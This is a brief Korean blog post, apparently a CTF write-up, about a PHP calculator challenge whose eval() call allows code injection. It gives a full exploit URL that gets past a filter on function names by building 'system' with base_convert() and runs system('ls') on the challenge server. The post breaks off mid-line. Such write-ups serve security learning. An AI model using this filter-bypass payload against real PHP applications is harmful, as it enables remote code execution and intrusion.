CTF/BDSec CTF 2022
[BDSec CTF 2022] Awesome Calculator
이 문제는 대회 도중 갑자기 사라졌다(?) 코드를 보면 eval()함수에서 취약점이 발생한다. (아쉽게 코드는 전부 날라갔다..) eval() 함수는 다른 함수를 실행할 수 있다는 취약점있다. 기억상 필터링 때문에 바로 system()함수를 호출할 수 없고 base_convert()함수를 필터링하고 있지 않아 base_convert() 함수로 우회하여 문제를 풀어야 했다. http://206.189.236.145:9001/?calculation=base_convert(1751504350,10,36)(base_convert(9911,10,28)(108).base_convert(9911,10,28)(115)) # system('ls') php > base_convert(1751504350,10,36); sy..
2022. 7. 22.